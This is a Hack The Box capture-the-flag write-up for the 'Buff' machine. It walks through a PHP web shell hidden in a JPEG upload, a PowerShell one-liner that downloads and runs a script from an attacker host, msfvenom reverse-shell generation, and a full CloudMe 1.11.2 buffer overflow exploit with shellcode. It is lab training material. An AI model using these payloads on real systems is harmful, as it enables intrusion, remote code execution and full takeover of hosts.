HTB Writeup: Buff

Never skip legs day.

Enumeration

nmap

# Nmap 7.92 scan initiated Sun Jul  3 11:41:02 2022 as: nmap -sC -sV -T3 -oA nmap-tcp-all-ports -p- -iL ip.txt
Nmap scan report for 10.129.25.107 (10.129.25.107)
Host is up (0.080s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-title: mrb3n's Bro Hut
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul  3 11:44:33 2022 -- 1 IP address (1 host up) scanned in 210.79 seconds
  1. A web server is found on port TCP/8080.

    Untitled

  2. The Apache header hints to Windows Operating System

  3. The web server is fuzzed with ffuf and wordlists common.txt and Common-PHP-Filenames.txt in SecLists/Discovery/Web-Content/

  4. There are two versions of same website available. One responds on the root directory / , and one on /ex/ directory.

    Untitled

  5. It appears to be staging/testing website. Further fuzzing reveals interesting page at /ex/upload.php. It appears to be a file upload functionality.

    Untitled

  6. The source of upload page shows, first field is ext, second field is name, and file browser accept image/* types.

    Untitled

User Access

Uploading Web Shell

  1. A file rev_update.php with a one line web shell payload <?php system($_GET["cmd"]);?> is uploaded, with filename rev_update and extension php. The webserver displays an error in parsing the file.

    Untitled

  2. To bypass this behavior, a simple JPEG header can be added to the payload.jpegfile to make it look like an image. Also, the web form makes the following POST request:

    Untitled

  3. To preserve the payload, the Content-Type in the form needs to be changed from image/jpeg to application/octet-stream. ( Reference)

  4. A malicious JPEG can be created with following python script:

    from PIL import Image
       
    # Create a 1x1 JPEG image
    image_ob = Image.new('1', (1,1))             
       
    # Open the file to write the payload to
    payload_file = open("payload.jpeg","wb")
       
    # Save image data.
    image_ob.save(payload_file)
       
    # Append web shell payload
    payload_file.write(b'\n<?php system($_GET["cmd"]);?>\n')
       
    payload_file.close()
    

    Untitled

  5. To change the Content-Type value in POST data, MITM proxy like BurpSuite can be used.

    Untitled

  6. On successful write, the web page doesn’t return any error or output.

  7. After visiting /ex/rev_update.php, it is found that the payload is successfully written on the web server.

    Untitled

    Untitled

  8. A reverse shell can be achieved by making following request in cmd parameter:

    http://buff.htb/ex/rev_update.php?cmd=powershell -ep bypass iex(iwr http://attacker.htb:7070/Invoke-PowerShell.ps1 -usebasicparsing)
    

    Untitled

Privilege Escalation

Enumeration

  1. For enumeration, an enumeration script similar to linPEAS can be used. winPEAS does the same job.

  2. Analysis of enumeration results reveals the following information:

    1. There’s a listener on 127.0.0.1:8888

    2. An executable file CloudMe_1112.exe is present in Downloads folder.

      Untitled

  3. The contents of Tasks.bat file are:

    START C:/xampp/xampp_start.exe
    

    It’s the service to start XAMPP server.

  4. The CloudMe_1112.exe is a CloudMe version 1.11.2 software, which is vulnerable to Buffer Overflow.

    Untitled

  5. The Cloud Me service listens on port TCP/8888 by default.

Exploitation

  1. Since the web service is listening on private IP, the port has to be forwarded on local machine to achieve exploitation. This can be done by dropping an executable with staged meterpreter reverse shell payload. Metaploit Framework’s meterpreter has the command portfwd, which can be used to forward traffic from local port to remote port over the existing meterpreter session.

    1. Create an executable with the payload.

      Untitled

    2. Start a listener in msfconsole

      Untitled

    3. Drop the payload on remote host and execute it.

      Untitled

    4. Following command in meterpreter session will configure the required port forwarding.

      portfwd add -l 8888 -p 8888 -r 127.0.0.1
      
  2. The exploit at exploit-db.com/exploits/48389 is a simple Buffer Overflow POC with NOP Sled. To modify the payload, a new reverse shell with no stager can be created using msfvenom.

    msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=9092 -b '\x00\x0A\x0D' -f python -v payload
    
  3. After placing the output in the poc.py file, the final script looks like:

    # Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
    # Date: 2020-04-27
    # Exploit Author: Andy Bowden
    # Vendor Homepage: https://www.cloudme.com/en
    # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
    # Version: CloudMe 1.11.2
    # Tested on: Windows 10 x86
       
    #Instructions:
    # Start the CloudMe service and run the script.
       
    import socket
       
    target = "127.0.0.1"
       
    padding1   = b"\x90" * 1052
    EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
    NOPS       = b"\x90" * 30
       
    #msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
       
    payload =  b""
    payload += b"\xd9\xc3\xbe\x48\x8a\x4c\xc5\xd9\x74\x24\xf4\x5f"
    payload += b"\x29\xc9\xb1\x52\x31\x77\x17\x03\x77\x17\x83\x8f"
    payload += b"\x8e\xae\x30\xf3\x67\xac\xbb\x0b\x78\xd1\x32\xee"
    payload += b"\x49\xd1\x21\x7b\xf9\xe1\x22\x29\xf6\x8a\x67\xd9"
    payload += b"\x8d\xff\xaf\xee\x26\xb5\x89\xc1\xb7\xe6\xea\x40"
    payload += b"\x34\xf5\x3e\xa2\x05\x36\x33\xa3\x42\x2b\xbe\xf1"
    payload += b"\x1b\x27\x6d\xe5\x28\x7d\xae\x8e\x63\x93\xb6\x73"
    payload += b"\x33\x92\x97\x22\x4f\xcd\x37\xc5\x9c\x65\x7e\xdd"
    payload += b"\xc1\x40\xc8\x56\x31\x3e\xcb\xbe\x0b\xbf\x60\xff"
    payload += b"\xa3\x32\x78\x38\x03\xad\x0f\x30\x77\x50\x08\x87"
    payload += b"\x05\x8e\x9d\x13\xad\x45\x05\xff\x4f\x89\xd0\x74"
    payload += b"\x43\x66\x96\xd2\x40\x79\x7b\x69\x7c\xf2\x7a\xbd"
    payload += b"\xf4\x40\x59\x19\x5c\x12\xc0\x38\x38\xf5\xfd\x5a"
    payload += b"\xe3\xaa\x5b\x11\x0e\xbe\xd1\x78\x47\x73\xd8\x82"
    payload += b"\x97\x1b\x6b\xf1\xa5\x84\xc7\x9d\x85\x4d\xce\x5a"
    payload += b"\xe9\x67\xb6\xf4\x14\x88\xc7\xdd\xd2\xdc\x97\x75"
    payload += b"\xf2\x5c\x7c\x85\xfb\x88\xd3\xd5\x53\x63\x94\x85"
    payload += b"\x13\xd3\x7c\xcf\x9b\x0c\x9c\xf0\x71\x25\x37\x0b"
    payload += b"\x12\x40\xc2\x1d\xf7\x3c\xd0\x21\xd4\x38\x5d\xc7"
    payload += b"\x70\x51\x08\x50\xed\xc8\x11\x2a\x8c\x15\x8c\x57"
    payload += b"\x8e\x9e\x23\xa8\x41\x57\x49\xba\x36\x97\x04\xe0"
    payload += b"\x91\xa8\xb2\x8c\x7e\x3a\x59\x4c\x08\x27\xf6\x1b"
    payload += b"\x5d\x99\x0f\xc9\x73\x80\xb9\xef\x89\x54\x81\xab"
    payload += b"\x55\xa5\x0c\x32\x1b\x91\x2a\x24\xe5\x1a\x77\x10"
    payload += b"\xb9\x4c\x21\xce\x7f\x27\x83\xb8\x29\x94\x4d\x2c"
    payload += b"\xaf\xd6\x4d\x2a\xb0\x32\x38\xd2\x01\xeb\x7d\xed"
    payload += b"\xae\x7b\x8a\x96\xd2\x1b\x75\x4d\x57\x2b\x3c\xcf"
    payload += b"\xfe\xa4\x99\x9a\x42\xa9\x19\x71\x80\xd4\x99\x73"
    payload += b"\x79\x23\x81\xf6\x7c\x6f\x05\xeb\x0c\xe0\xe0\x0b"
    payload += b"\xa2\x01\x21"
       
    overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
       
    buf = padding1 + EIP + NOPS + payload + overrun
       
    try:
            s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((target,8888))
            s.send(buf)
    except Exception as e:
            print(sys.exc_value)
    
  4. The script is executed, and a reverse shell with privileges of Administrator is achieved.

    Untitled

The remote host is completely compromised.

Avatar
Mayank Malik
CRTP | Incident Responder | Synack Red Team Member | Threat Analyst | Security Researcher | Cloud/Network Architect

Mayank Malik is a tech savvy person, Red Team Enthusiast, and likes to wander around to learn new stuff. Cryptography, Networking and System Administrations are his forte. He’s one of the Founding Members for CTF Team, Abs0lut3Pwn4g3, and Core Member at DC 91120 (DEFCON Community Group). Apart from the mentioned skills, he’s good at communication skills and is goal oriented person. Yellow belt holder at pwn.college in pursue of learning and achieving Blue Belt.

Related